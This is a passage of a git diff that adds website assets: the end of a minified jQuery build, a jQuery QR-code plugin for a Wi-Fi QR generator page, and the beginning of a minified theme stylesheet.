+ : i === t
+ ? b.css(n, r, s)
+ : b.style(n, r, i, s);
+ },
+ n,
+ a ? i : t,
+ a,
+ null,
+ );
+ };
+ },
+ );
+ }),
+ (e.jQuery = e.$ = b),
+ 'function' == typeof define &&
+ define.amd &&
+ define.amd.jQuery &&
+ define('jquery', [], function () {
+ return b;
+ });
+})(window);
diff --git a/assets/pages/wifi-qr-generator/jquery.qrcode.min.js b/assets/pages/wifi-qr-generator/jquery.qrcode.min.js
new file mode 100644
index 000000000..63d31f502
--- /dev/null
+++ b/assets/pages/wifi-qr-generator/jquery.qrcode.min.js
@@ -0,0 +1,868 @@
+(function (r) {
+ r.fn.qrcode = function (h) {
+ var s;
+ function u(a) {
+ this.mode = s;
+ this.data = a;
+ }
+ function o(a, c) {
+ this.typeNumber = a;
+ this.errorCorrectLevel = c;
+ this.modules = null;
+ this.moduleCount = 0;
+ this.dataCache = null;
+ this.dataList = [];
+ }
+ function q(a, c) {
+ if (void 0 == a.length) throw Error(a.length + '/' + c);
+ for (var d = 0; d < a.length && 0 == a[d]; ) d++;
+ this.num = Array(a.length - d + c);
+ for (var b = 0; b < a.length - d; b++) this.num[b] = a[b + d];
+ }
+ function p(a, c) {
+ this.totalCount = a;
+ this.dataCount = c;
+ }
+ function t() {
+ this.buffer = [];
+ this.length = 0;
+ }
+ u.prototype = {
+ getLength: function () {
+ return this.data.length;
+ },
+ write: function (a) {
+ for (var c = 0; c < this.data.length; c++)
+ a.put(this.data.charCodeAt(c), 8);
+ },
+ };
+ o.prototype = {
+ addData: function (a) {
+ this.dataList.push(new u(a));
+ this.dataCache = null;
+ },
+ isDark: function (a, c) {
+ if (
+ 0 > a ||
+ this.moduleCount <= a ||
+ 0 > c ||
+ this.moduleCount <= c
+ )
+ throw Error(a + ',' + c);
+ return this.modules[a][c];
+ },
+ getModuleCount: function () {
+ return this.moduleCount;
+ },
+ make: function () {
+ if (1 > this.typeNumber) {
+ for (var a = 1, a = 1; 40 > a; a++) {
+ for (
+ var c = p.getRSBlocks(a, this.errorCorrectLevel),
+ d = new t(),
+ b = 0,
+ e = 0;
+ e < c.length;
+ e++
+ )
+ b += c[e].dataCount;
+ for (e = 0; e < this.dataList.length; e++)
+ (c = this.dataList[e]),
+ d.put(c.mode, 4),
+ d.put(
+ c.getLength(),
+ j.getLengthInBits(c.mode, a),
+ ),
+ c.write(d);
+ if (d.getLengthInBits() <= 8 * b) break;
+ }
+ this.typeNumber = a;
+ }
+ this.makeImpl(!1, this.getBestMaskPattern());
+ },
+ makeImpl: function (a, c) {
+ this.moduleCount = 4 * this.typeNumber + 17;
+ this.modules = Array(this.moduleCount);
+ for (var d = 0; d < this.moduleCount; d++) {
+ this.modules[d] = Array(this.moduleCount);
+ for (var b = 0; b < this.moduleCount; b++)
+ this.modules[d][b] = null;
+ }
+ this.setupPositionProbePattern(0, 0);
+ this.setupPositionProbePattern(this.moduleCount - 7, 0);
+ this.setupPositionProbePattern(0, this.moduleCount - 7);
+ this.setupPositionAdjustPattern();
+ this.setupTimingPattern();
+ this.setupTypeInfo(a, c);
+ 7 <= this.typeNumber && this.setupTypeNumber(a);
+ null == this.dataCache &&
+ (this.dataCache = o.createData(
+ this.typeNumber,
+ this.errorCorrectLevel,
+ this.dataList,
+ ));
+ this.mapData(this.dataCache, c);
+ },
+ setupPositionProbePattern: function (a, c) {
+ for (var d = -1; 7 >= d; d++)
+ if (!(-1 >= a + d || this.moduleCount <= a + d))
+ for (var b = -1; 7 >= b; b++)
+ -1 >= c + b ||
+ this.moduleCount <= c + b ||
+ (this.modules[a + d][c + b] =
+ (0 <= d && 6 >= d && (0 == b || 6 == b)) ||
+ (0 <= b && 6 >= b && (0 == d || 6 == d)) ||
+ (2 <= d && 4 >= d && 2 <= b && 4 >= b)
+ ? !0
+ : !1);
+ },
+ getBestMaskPattern: function () {
+ for (var a = 0, c = 0, d = 0; 8 > d; d++) {
+ this.makeImpl(!0, d);
+ var b = j.getLostPoint(this);
+ if (0 == d || a > b) (a = b), (c = d);
+ }
+ return c;
+ },
+ createMovieClip: function (a, c, d) {
+ a = a.createEmptyMovieClip(c, d);
+ this.make();
+ for (c = 0; c < this.modules.length; c++)
+ for (
+ var d = 1 * c, b = 0;
+ b < this.modules[c].length;
+ b++
+ ) {
+ var e = 1 * b;
+ this.modules[c][b] &&
+ (a.beginFill(0, 100),
+ a.moveTo(e, d),
+ a.lineTo(e + 1, d),
+ a.lineTo(e + 1, d + 1),
+ a.lineTo(e, d + 1),
+ a.endFill());
+ }
+ return a;
+ },
+ setupTimingPattern: function () {
+ for (var a = 8; a < this.moduleCount - 8; a++)
+ null == this.modules[a][6] &&
+ (this.modules[a][6] = 0 == a % 2);
+ for (a = 8; a < this.moduleCount - 8; a++)
+ null == this.modules[6][a] &&
+ (this.modules[6][a] = 0 == a % 2);
+ },
+ setupPositionAdjustPattern: function () {
+ for (
+ var a = j.getPatternPosition(this.typeNumber), c = 0;
+ c < a.length;
+ c++
+ )
+ for (var d = 0; d < a.length; d++) {
+ var b = a[c],
+ e = a[d];
+ if (null == this.modules[b][e])
+ for (var f = -2; 2 >= f; f++)
+ for (var i = -2; 2 >= i; i++)
+ this.modules[b + f][e + i] =
+ -2 == f ||
+ 2 == f ||
+ -2 == i ||
+ 2 == i ||
+ (0 == f && 0 == i)
+ ? !0
+ : !1;
+ }
+ },
+ setupTypeNumber: function (a) {
+ for (
+ var c = j.getBCHTypeNumber(this.typeNumber), d = 0;
+ 18 > d;
+ d++
+ ) {
+ var b = !a && 1 == ((c >> d) & 1);
+ this.modules[Math.floor(d / 3)][
+ (d % 3) + this.moduleCount - 8 - 3
+ ] = b;
+ }
+ for (d = 0; 18 > d; d++)
+ (b = !a && 1 == ((c >> d) & 1)),
+ (this.modules[(d % 3) + this.moduleCount - 8 - 3][
+ Math.floor(d / 3)
+ ] = b);
+ },
+ setupTypeInfo: function (a, c) {
+ for (
+ var d = j.getBCHTypeInfo((this.errorCorrectLevel << 3) | c),
+ b = 0;
+ 15 > b;
+ b++
+ ) {
+ var e = !a && 1 == ((d >> b) & 1);
+ 6 > b
+ ? (this.modules[b][8] = e)
+ : 8 > b
+ ? (this.modules[b + 1][8] = e)
+ : (this.modules[this.moduleCount - 15 + b][8] = e);
+ }
+ for (b = 0; 15 > b; b++)
+ (e = !a && 1 == ((d >> b) & 1)),
+ 8 > b
+ ? (this.modules[8][this.moduleCount - b - 1] = e)
+ : 9 > b
+ ? (this.modules[8][15 - b - 1 + 1] = e)
+ : (this.modules[8][15 - b - 1] = e);
+ this.modules[this.moduleCount - 8][8] = !a;
+ },
+ mapData: function (a, c) {
+ for (
+ var d = -1,
+ b = this.moduleCount - 1,
+ e = 7,
+ f = 0,
+ i = this.moduleCount - 1;
+ 0 < i;
+ i -= 2
+ )
+ for (6 == i && i--; ; ) {
+ for (var g = 0; 2 > g; g++)
+ if (null == this.modules[b][i - g]) {
+ var n = !1;
+ f < a.length && (n = 1 == ((a[f] >>> e) & 1));
+ j.getMask(c, b, i - g) && (n = !n);
+ this.modules[b][i - g] = n;
+ e--;
+ -1 == e && (f++, (e = 7));
+ }
+ b += d;
+ if (0 > b || this.moduleCount <= b) {
+ b -= d;
+ d = -d;
+ break;
+ }
+ }
+ },
+ };
+ o.PAD0 = 236;
+ o.PAD1 = 17;
+ o.createData = function (a, c, d) {
+ for (
+ var c = p.getRSBlocks(a, c), b = new t(), e = 0;
+ e < d.length;
+ e++
+ ) {
+ var f = d[e];
+ b.put(f.mode, 4);
+ b.put(f.getLength(), j.getLengthInBits(f.mode, a));
+ f.write(b);
+ }
+ for (e = a = 0; e < c.length; e++) a += c[e].dataCount;
+ if (b.getLengthInBits() > 8 * a)
+ throw Error(
+ 'code length overflow. (' +
+ b.getLengthInBits() +
+ '>' +
+ 8 * a +
+ ')',
+ );
+ for (
+ b.getLengthInBits() + 4 <= 8 * a && b.put(0, 4);
+ 0 != b.getLengthInBits() % 8;
+
+ )
+ b.putBit(!1);
+ for (; !(b.getLengthInBits() >= 8 * a); ) {
+ b.put(o.PAD0, 8);
+ if (b.getLengthInBits() >= 8 * a) break;
+ b.put(o.PAD1, 8);
+ }
+ return o.createBytes(b, c);
+ };
+ o.createBytes = function (a, c) {
+ for (
+ var d = 0,
+ b = 0,
+ e = 0,
+ f = Array(c.length),
+ i = Array(c.length),
+ g = 0;
+ g < c.length;
+ g++
+ ) {
+ var n = c[g].dataCount,
+ h = c[g].totalCount - n,
+ b = Math.max(b, n),
+ e = Math.max(e, h);
+ f[g] = Array(n);
+ for (var k = 0; k < f[g].length; k++)
+ f[g][k] = 255 & a.buffer[k + d];
+ d += n;
+ k = j.getErrorCorrectPolynomial(h);
+ n = new q(f[g], k.getLength() - 1).mod(k);
+ i[g] = Array(k.getLength() - 1);
+ for (k = 0; k < i[g].length; k++)
+ (h = k + n.getLength() - i[g].length),
+ (i[g][k] = 0 <= h ? n.get(h) : 0);
+ }
+ for (k = g = 0; k < c.length; k++) g += c[k].totalCount;
+ d = Array(g);
+ for (k = n = 0; k < b; k++)
+ for (g = 0; g < c.length; g++)
+ k < f[g].length && (d[n++] = f[g][k]);
+ for (k = 0; k < e; k++)
+ for (g = 0; g < c.length; g++)
+ k < i[g].length && (d[n++] = i[g][k]);
+ return d;
+ };
+ s = 4;
+ for (
+ var j = {
+ PATTERN_POSITION_TABLE: [
+ [],
+ [6, 18],
+ [6, 22],
+ [6, 26],
+ [6, 30],
+ [6, 34],
+ [6, 22, 38],
+ [6, 24, 42],
+ [6, 26, 46],
+ [6, 28, 50],
+ [6, 30, 54],
+ [6, 32, 58],
+ [6, 34, 62],
+ [6, 26, 46, 66],
+ [6, 26, 48, 70],
+ [6, 26, 50, 74],
+ [6, 30, 54, 78],
+ [6, 30, 56, 82],
+ [6, 30, 58, 86],
+ [6, 34, 62, 90],
+ [6, 28, 50, 72, 94],
+ [6, 26, 50, 74, 98],
+ [6, 30, 54, 78, 102],
+ [6, 28, 54, 80, 106],
+ [6, 32, 58, 84, 110],
+ [6, 30, 58, 86, 114],
+ [6, 34, 62, 90, 118],
+ [6, 26, 50, 74, 98, 122],
+ [6, 30, 54, 78, 102, 126],
+ [6, 26, 52, 78, 104, 130],
+ [6, 30, 56, 82, 108, 134],
+ [6, 34, 60, 86, 112, 138],
+ [6, 30, 58, 86, 114, 142],
+ [6, 34, 62, 90, 118, 146],
+ [6, 30, 54, 78, 102, 126, 150],
+ [6, 24, 50, 76, 102, 128, 154],
+ [6, 28, 54, 80, 106, 132, 158],
+ [6, 32, 58, 84, 110, 136, 162],
+ [6, 26, 54, 82, 110, 138, 166],
+ [6, 30, 58, 86, 114, 142, 170],
+ ],
+ G15: 1335,
+ G18: 7973,
+ G15_MASK: 21522,
+ getBCHTypeInfo: function (a) {
+ for (
+ var c = a << 10;
+ 0 <= j.getBCHDigit(c) - j.getBCHDigit(j.G15);
+
+ )
+ c ^=
+ j.G15 <<
+ (j.getBCHDigit(c) - j.getBCHDigit(j.G15));
+ return ((a << 10) | c) ^ j.G15_MASK;
+ },
+ getBCHTypeNumber: function (a) {
+ for (
+ var c = a << 12;
+ 0 <= j.getBCHDigit(c) - j.getBCHDigit(j.G18);
+
+ )
+ c ^=
+ j.G18 <<
+ (j.getBCHDigit(c) - j.getBCHDigit(j.G18));
+ return (a << 12) | c;
+ },
+ getBCHDigit: function (a) {
+ for (var c = 0; 0 != a; ) c++, (a >>>= 1);
+ return c;
+ },
+ getPatternPosition: function (a) {
+ return j.PATTERN_POSITION_TABLE[a - 1];
+ },
+ getMask: function (a, c, d) {
+ switch (a) {
+ case 0:
+ return 0 == (c + d) % 2;
+ case 1:
+ return 0 == c % 2;
+ case 2:
+ return 0 == d % 3;
+ case 3:
+ return 0 == (c + d) % 3;
+ case 4:
+ return (
+ 0 ==
+ (Math.floor(c / 2) + Math.floor(d / 3)) % 2
+ );
+ case 5:
+ return 0 == ((c * d) % 2) + ((c * d) % 3);
+ case 6:
+ return 0 == (((c * d) % 2) + ((c * d) % 3)) % 2;
+ case 7:
+ return 0 == (((c * d) % 3) + ((c + d) % 2)) % 2;
+ default:
+ throw Error('bad maskPattern:' + a);
+ }
+ },
+ getErrorCorrectPolynomial: function (a) {
+ for (var c = new q([1], 0), d = 0; d < a; d++)
+ c = c.multiply(new q([1, l.gexp(d)], 0));
+ return c;
+ },
+ getLengthInBits: function (a, c) {
+ if (1 <= c && 10 > c)
+ switch (a) {
+ case 1:
+ return 10;
+ case 2:
+ return 9;
+ case s:
+ return 8;
+ case 8:
+ return 8;
+ default:
+ throw Error('mode:' + a);
+ }
+ else if (27 > c)
+ switch (a) {
+ case 1:
+ return 12;
+ case 2:
+ return 11;
+ case s:
+ return 16;
+ case 8:
+ return 10;
+ default:
+ throw Error('mode:' + a);
+ }
+ else if (41 > c)
+ switch (a) {
+ case 1:
+ return 14;
+ case 2:
+ return 13;
+ case s:
+ return 16;
+ case 8:
+ return 12;
+ default:
+ throw Error('mode:' + a);
+ }
+ else throw Error('type:' + c);
+ },
+ getLostPoint: function (a) {
+ for (
+ var c = a.getModuleCount(), d = 0, b = 0;
+ b < c;
+ b++
+ )
+ for (var e = 0; e < c; e++) {
+ for (
+ var f = 0, i = a.isDark(b, e), g = -1;
+ 1 >= g;
+ g++
+ )
+ if (!(0 > b + g || c <= b + g))
+ for (var h = -1; 1 >= h; h++)
+ 0 > e + h ||
+ c <= e + h ||
+ (0 == g && 0 == h) ||
+ (i == a.isDark(b + g, e + h) &&
+ f++);
+ 5 < f && (d += 3 + f - 5);
+ }
+ for (b = 0; b < c - 1; b++)
+ for (e = 0; e < c - 1; e++)
+ if (
+ ((f = 0),
+ a.isDark(b, e) && f++,
+ a.isDark(b + 1, e) && f++,
+ a.isDark(b, e + 1) && f++,
+ a.isDark(b + 1, e + 1) && f++,
+ 0 == f || 4 == f)
+ )
+ d += 3;
+ for (b = 0; b < c; b++)
+ for (e = 0; e < c - 6; e++)
+ a.isDark(b, e) &&
+ !a.isDark(b, e + 1) &&
+ a.isDark(b, e + 2) &&
+ a.isDark(b, e + 3) &&
+ a.isDark(b, e + 4) &&
+ !a.isDark(b, e + 5) &&
+ a.isDark(b, e + 6) &&
+ (d += 40);
+ for (e = 0; e < c; e++)
+ for (b = 0; b < c - 6; b++)
+ a.isDark(b, e) &&
+ !a.isDark(b + 1, e) &&
+ a.isDark(b + 2, e) &&
+ a.isDark(b + 3, e) &&
+ a.isDark(b + 4, e) &&
+ !a.isDark(b + 5, e) &&
+ a.isDark(b + 6, e) &&
+ (d += 40);
+ for (e = f = 0; e < c; e++)
+ for (b = 0; b < c; b++) a.isDark(b, e) && f++;
+ a = Math.abs((100 * f) / c / c - 50) / 5;
+ return d + 10 * a;
+ },
+ },
+ l = {
+ glog: function (a) {
+ if (1 > a) throw Error('glog(' + a + ')');
+ return l.LOG_TABLE[a];
+ },
+ gexp: function (a) {
+ for (; 0 > a; ) a += 255;
+ for (; 256 <= a; ) a -= 255;
+ return l.EXP_TABLE[a];
+ },
+ EXP_TABLE: Array(256),
+ LOG_TABLE: Array(256),
+ },
+ m = 0;
+ 8 > m;
+ m++
+ )
+ l.EXP_TABLE[m] = 1 << m;
+ for (m = 8; 256 > m; m++)
+ l.EXP_TABLE[m] =
+ l.EXP_TABLE[m - 4] ^
+ l.EXP_TABLE[m - 5] ^
+ l.EXP_TABLE[m - 6] ^
+ l.EXP_TABLE[m - 8];
+ for (m = 0; 255 > m; m++) l.LOG_TABLE[l.EXP_TABLE[m]] = m;
+ q.prototype = {
+ get: function (a) {
+ return this.num[a];
+ },
+ getLength: function () {
+ return this.num.length;
+ },
+ multiply: function (a) {
+ for (
+ var c = Array(this.getLength() + a.getLength() - 1), d = 0;
+ d < this.getLength();
+ d++
+ )
+ for (var b = 0; b < a.getLength(); b++)
+ c[d + b] ^= l.gexp(
+ l.glog(this.get(d)) + l.glog(a.get(b)),
+ );
+ return new q(c, 0);
+ },
+ mod: function (a) {
+ if (0 > this.getLength() - a.getLength()) return this;
+ for (
+ var c = l.glog(this.get(0)) - l.glog(a.get(0)),
+ d = Array(this.getLength()),
+ b = 0;
+ b < this.getLength();
+ b++
+ )
+ d[b] = this.get(b);
+ for (b = 0; b < a.getLength(); b++)
+ d[b] ^= l.gexp(l.glog(a.get(b)) + c);
+ return new q(d, 0).mod(a);
+ },
+ };
+ p.RS_BLOCK_TABLE = [
+ [1, 26, 19],
+ [1, 26, 16],
+ [1, 26, 13],
+ [1, 26, 9],
+ [1, 44, 34],
+ [1, 44, 28],
+ [1, 44, 22],
+ [1, 44, 16],
+ [1, 70, 55],
+ [1, 70, 44],
+ [2, 35, 17],
+ [2, 35, 13],
+ [1, 100, 80],
+ [2, 50, 32],
+ [2, 50, 24],
+ [4, 25, 9],
+ [1, 134, 108],
+ [2, 67, 43],
+ [2, 33, 15, 2, 34, 16],
+ [2, 33, 11, 2, 34, 12],
+ [2, 86, 68],
+ [4, 43, 27],
+ [4, 43, 19],
+ [4, 43, 15],
+ [2, 98, 78],
+ [4, 49, 31],
+ [2, 32, 14, 4, 33, 15],
+ [4, 39, 13, 1, 40, 14],
+ [2, 121, 97],
+ [2, 60, 38, 2, 61, 39],
+ [4, 40, 18, 2, 41, 19],
+ [4, 40, 14, 2, 41, 15],
+ [2, 146, 116],
+ [3, 58, 36, 2, 59, 37],
+ [4, 36, 16, 4, 37, 17],
+ [4, 36, 12, 4, 37, 13],
+ [2, 86, 68, 2, 87, 69],
+ [4, 69, 43, 1, 70, 44],
+ [6, 43, 19, 2, 44, 20],
+ [6, 43, 15, 2, 44, 16],
+ [4, 101, 81],
+ [1, 80, 50, 4, 81, 51],
+ [4, 50, 22, 4, 51, 23],
+ [3, 36, 12, 8, 37, 13],
+ [2, 116, 92, 2, 117, 93],
+ [6, 58, 36, 2, 59, 37],
+ [4, 46, 20, 6, 47, 21],
+ [7, 42, 14, 4, 43, 15],
+ [4, 133, 107],
+ [8, 59, 37, 1, 60, 38],
+ [8, 44, 20, 4, 45, 21],
+ [12, 33, 11, 4, 34, 12],
+ [3, 145, 115, 1, 146, 116],
+ [4, 64, 40, 5, 65, 41],
+ [11, 36, 16, 5, 37, 17],
+ [11, 36, 12, 5, 37, 13],
+ [5, 109, 87, 1, 110, 88],
+ [5, 65, 41, 5, 66, 42],
+ [5, 54, 24, 7, 55, 25],
+ [11, 36, 12],
+ [5, 122, 98, 1, 123, 99],
+ [7, 73, 45, 3, 74, 46],
+ [15, 43, 19, 2, 44, 20],
+ [3, 45, 15, 13, 46, 16],
+ [1, 135, 107, 5, 136, 108],
+ [10, 74, 46, 1, 75, 47],
+ [1, 50, 22, 15, 51, 23],
+ [2, 42, 14, 17, 43, 15],
+ [5, 150, 120, 1, 151, 121],
+ [9, 69, 43, 4, 70, 44],
+ [17, 50, 22, 1, 51, 23],
+ [2, 42, 14, 19, 43, 15],
+ [3, 141, 113, 4, 142, 114],
+ [3, 70, 44, 11, 71, 45],
+ [17, 47, 21, 4, 48, 22],
+ [9, 39, 13, 16, 40, 14],
+ [3, 135, 107, 5, 136, 108],
+ [3, 67, 41, 13, 68, 42],
+ [15, 54, 24, 5, 55, 25],
+ [15, 43, 15, 10, 44, 16],
+ [4, 144, 116, 4, 145, 117],
+ [17, 68, 42],
+ [17, 50, 22, 6, 51, 23],
+ [19, 46, 16, 6, 47, 17],
+ [2, 139, 111, 7, 140, 112],
+ [17, 74, 46],
+ [7, 54, 24, 16, 55, 25],
+ [34, 37, 13],
+ [4, 151, 121, 5, 152, 122],
+ [4, 75, 47, 14, 76, 48],
+ [11, 54, 24, 14, 55, 25],
+ [16, 45, 15, 14, 46, 16],
+ [6, 147, 117, 4, 148, 118],
+ [6, 73, 45, 14, 74, 46],
+ [11, 54, 24, 16, 55, 25],
+ [30, 46, 16, 2, 47, 17],
+ [8, 132, 106, 4, 133, 107],
+ [8, 75, 47, 13, 76, 48],
+ [7, 54, 24, 22, 55, 25],
+ [22, 45, 15, 13, 46, 16],
+ [10, 142, 114, 2, 143, 115],
+ [19, 74, 46, 4, 75, 47],
+ [28, 50, 22, 6, 51, 23],
+ [33, 46, 16, 4, 47, 17],
+ [8, 152, 122, 4, 153, 123],
+ [22, 73, 45, 3, 74, 46],
+ [8, 53, 23, 26, 54, 24],
+ [12, 45, 15, 28, 46, 16],
+ [3, 147, 117, 10, 148, 118],
+ [3, 73, 45, 23, 74, 46],
+ [4, 54, 24, 31, 55, 25],
+ [11, 45, 15, 31, 46, 16],
+ [7, 146, 116, 7, 147, 117],
+ [21, 73, 45, 7, 74, 46],
+ [1, 53, 23, 37, 54, 24],
+ [19, 45, 15, 26, 46, 16],
+ [5, 145, 115, 10, 146, 116],
+ [19, 75, 47, 10, 76, 48],
+ [15, 54, 24, 25, 55, 25],
+ [23, 45, 15, 25, 46, 16],
+ [13, 145, 115, 3, 146, 116],
+ [2, 74, 46, 29, 75, 47],
+ [42, 54, 24, 1, 55, 25],
+ [23, 45, 15, 28, 46, 16],
+ [17, 145, 115],
+ [10, 74, 46, 23, 75, 47],
+ [10, 54, 24, 35, 55, 25],
+ [19, 45, 15, 35, 46, 16],
+ [17, 145, 115, 1, 146, 116],
+ [14, 74, 46, 21, 75, 47],
+ [29, 54, 24, 19, 55, 25],
+ [11, 45, 15, 46, 46, 16],
+ [13, 145, 115, 6, 146, 116],
+ [14, 74, 46, 23, 75, 47],
+ [44, 54, 24, 7, 55, 25],
+ [59, 46, 16, 1, 47, 17],
+ [12, 151, 121, 7, 152, 122],
+ [12, 75, 47, 26, 76, 48],
+ [39, 54, 24, 14, 55, 25],
+ [22, 45, 15, 41, 46, 16],
+ [6, 151, 121, 14, 152, 122],
+ [6, 75, 47, 34, 76, 48],
+ [46, 54, 24, 10, 55, 25],
+ [2, 45, 15, 64, 46, 16],
+ [17, 152, 122, 4, 153, 123],
+ [29, 74, 46, 14, 75, 47],
+ [49, 54, 24, 10, 55, 25],
+ [24, 45, 15, 46, 46, 16],
+ [4, 152, 122, 18, 153, 123],
+ [13, 74, 46, 32, 75, 47],
+ [48, 54, 24, 14, 55, 25],
+ [42, 45, 15, 32, 46, 16],
+ [20, 147, 117, 4, 148, 118],
+ [40, 75, 47, 7, 76, 48],
+ [43, 54, 24, 22, 55, 25],
+ [10, 45, 15, 67, 46, 16],
+ [19, 148, 118, 6, 149, 119],
+ [18, 75, 47, 31, 76, 48],
+ [34, 54, 24, 34, 55, 25],
+ [20, 45, 15, 61, 46, 16],
+ ];
+ p.getRSBlocks = function (a, c) {
+ var d = p.getRsBlockTable(a, c);
+ if (void 0 == d)
+ throw Error(
+ 'bad rs block @ typeNumber:' +
+ a +
+ '/errorCorrectLevel:' +
+ c,
+ );
+ for (var b = d.length / 3, e = [], f = 0; f < b; f++)
+ for (
+ var h = d[3 * f + 0],
+ g = d[3 * f + 1],
+ j = d[3 * f + 2],
+ l = 0;
+ l < h;
+ l++
+ )
+ e.push(new p(g, j));
+ return e;
+ };
+ p.getRsBlockTable = function (a, c) {
+ switch (c) {
+ case 1:
+ return p.RS_BLOCK_TABLE[4 * (a - 1) + 0];
+ case 0:
+ return p.RS_BLOCK_TABLE[4 * (a - 1) + 1];
+ case 3:
+ return p.RS_BLOCK_TABLE[4 * (a - 1) + 2];
+ case 2:
+ return p.RS_BLOCK_TABLE[4 * (a - 1) + 3];
+ }
+ };
+ t.prototype = {
+ get: function (a) {
+ return (
+ 1 ==
+ ((this.buffer[Math.floor(a / 8)] >>> (7 - (a % 8))) & 1)
+ );
+ },
+ put: function (a, c) {
+ for (var d = 0; d < c; d++)
+ this.putBit(1 == ((a >>> (c - d - 1)) & 1));
+ },
+ getLengthInBits: function () {
+ return this.length;
+ },
+ putBit: function (a) {
+ var c = Math.floor(this.length / 8);
+ this.buffer.length <= c && this.buffer.push(0);
+ a && (this.buffer[c] |= 128 >>> this.length % 8);
+ this.length++;
+ },
+ };
+ 'string' === typeof h && (h = {text: h});
+ h = r.extend(
+ {},
+ {
+ render: 'canvas',
+ width: 256,
+ height: 256,
+ typeNumber: -1,
+ correctLevel: 2,
+ background: '#ffffff',
+ foreground: '#000000',
+ },
+ h,
+ );
+ return this.each(function () {
+ var a;
+ if ('canvas' == h.render) {
+ a = new o(h.typeNumber, h.correctLevel);
+ a.addData(h.text);
+ a.make();
+ var c = document.createElement('canvas');
+ c.width = h.width;
+ c.height = h.height;
+ for (
+ var d = c.getContext('2d'),
+ b = h.width / a.getModuleCount(),
+ e = h.height / a.getModuleCount(),
+ f = 0;
+ f < a.getModuleCount();
+ f++
+ )
+ for (var i = 0; i < a.getModuleCount(); i++) {
+ d.fillStyle = a.isDark(f, i)
+ ? h.foreground
+ : h.background;
+ var g = Math.ceil((i + 1) * b) - Math.floor(i * b),
+ j = Math.ceil((f + 1) * b) - Math.floor(f * b);
+ d.fillRect(Math.round(i * b), Math.round(f * e), g, j);
+ }
+ } else {
+ a = new o(h.typeNumber, h.correctLevel);
+ a.addData(h.text);
+ a.make();
+ c = r('
')
+ .css('width', h.width + 'px')
+ .css('height', h.height + 'px')
+ .css('border', '0px')
+ .css('border-collapse', 'collapse')
+ .css('background-color', h.background);
+ d = h.width / a.getModuleCount();
+ b = h.height / a.getModuleCount();
+ for (e = 0; e < a.getModuleCount(); e++) {
+ f = r('
')
+ .css('height', b + 'px')
+ .appendTo(c);
+ for (i = 0; i < a.getModuleCount(); i++)
+ r('
')
+ .css('width', d + 'px')
+ .css(
+ 'background-color',
+ a.isDark(e, i) ? h.foreground : h.background,
+ )
+ .appendTo(f);
+ }
+ }
+ a = c;
+ jQuery(a).appendTo(this);
+ });
+ };
+})(jQuery);
diff --git a/assets/stylesheets/main.26e3688c.min.css b/assets/stylesheets/main.26e3688c.min.css
new file mode 100644
index 000000000..d6684d58a
--- /dev/null
+++ b/assets/stylesheets/main.26e3688c.min.css
@@ -0,0 +1 @@
+@charset "UTF-8";html{-webkit-text-size-adjust:none;-moz-text-size-adjust:none;text-size-adjust:none;box-sizing:border-box}*,:after,:before{box-sizing:inherit}@media (prefers-reduced-motion){*,:after,:before{transition:none!important}}body{margin:0}a,button,input,label{-webkit-tap-highlight-color:transparent}a{color:inherit;text-decoration:none}hr{border:0;box-sizing:initial;display:block;height:.05rem;overflow:visible;padding:0}small{font-size:80%}sub,sup{line-height:1em}img{border-style:none}table{border-collapse:initial;border-spacing:0}td,th{font-weight:400;vertical-align:top}button{background:#0000;border:0;font-family:inherit;font-size:inherit;margin:0;padding:0}input{border:0;outline:none}:root{--md-primary-fg-color:#4051b5;--md-primary-fg-color--light:#5d6cc0;--md-primary-fg-color--dark:#303fa1;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3;--md-accent-fg-color:#526cfe;--md-accent-fg-color--transparent:#526cfe1a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-scheme=default]{color-scheme:light}[data-md-color-scheme=default] img[src$="#gh-dark-mode-only"],[data-md-color-scheme=default] 
img[src$="#only-dark"]{display:none}:root,[data-md-color-scheme=default]{--md-default-fg-color:#000000de;--md-default-fg-color--light:#0000008a;--md-default-fg-color--lighter:#00000052;--md-default-fg-color--lightest:#00000012;--md-default-bg-color:#fff;--md-default-bg-color--light:#ffffffb3;--md-default-bg-color--lighter:#ffffff4d;--md-default-bg-color--lightest:#ffffff1f;--md-code-fg-color:#36464e;--md-code-bg-color:#f5f5f5;--md-code-hl-color:#ffff0080;--md-code-hl-number-color:#d52a2a;--md-code-hl-special-color:#db1457;--md-code-hl-function-color:#a846b9;--md-code-hl-constant-color:#6e59d9;--md-code-hl-keyword-color:#3f6ec6;--md-code-hl-string-color:#1c7d4d;--md-code-hl-name-color:var(--md-code-fg-color);--md-code-hl-operator-color:var(--md-default-fg-color--light);--md-code-hl-punctuation-color:var(--md-default-fg-color--light);--md-code-hl-comment-color:var(--md-default-fg-color--light);--md-code-hl-generic-color:var(--md-default-fg-color--light);--md-code-hl-variable-color:var(--md-default-fg-color--light);--md-typeset-color:var(--md-default-fg-color);--md-typeset-a-color:var(--md-primary-fg-color);--md-typeset-mark-color:#ffff0080;--md-typeset-del-color:#f5503d26;--md-typeset-ins-color:#0bd57026;--md-typeset-kbd-color:#fafafa;--md-typeset-kbd-accent-color:#fff;--md-typeset-kbd-border-color:#b8b8b8;--md-typeset-table-color:#0000001f;--md-typeset-table-color--light:rgba(0,0,0,.035);--md-admonition-fg-color:var(--md-default-fg-color);--md-admonition-bg-color:var(--md-default-bg-color);--md-warning-fg-color:#000000de;--md-warning-bg-color:#ff9;--md-footer-fg-color:#fff;--md-footer-fg-color--light:#ffffffb3;--md-footer-fg-color--lighter:#ffffff73;--md-footer-bg-color:#000000de;--md-footer-bg-color--dark:#00000052;--md-shadow-z1:0 0.2rem 0.5rem #0000000d,0 0 0.05rem #0000001a;--md-shadow-z2:0 0.2rem 0.5rem #0000001a,0 0 0.05rem #00000040;--md-shadow-z3:0 0.2rem 0.5rem #0003,0 0 0.05rem #00000059}.md-icon 
svg{fill:currentcolor;display:block;height:1.2rem;width:1.2rem}body{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;--md-text-font-family:var(--md-text-font,_),-apple-system,BlinkMacSystemFont,Helvetica,Arial,sans-serif;--md-code-font-family:var(--md-code-font,_),SFMono-Regular,Consolas,Menlo,monospace}aside,body,input{font-feature-settings:"kern","liga";color:var(--md-typeset-color);font-family:var(--md-text-font-family)}code,kbd,pre{font-feature-settings:"kern";font-family:var(--md-code-font-family)}:root{--md-typeset-table-sort-icon:url('data:image/svg+xml;charset=utf-8,
');--md-typeset-table-sort-icon--asc:url('data:image/svg+xml;charset=utf-8,
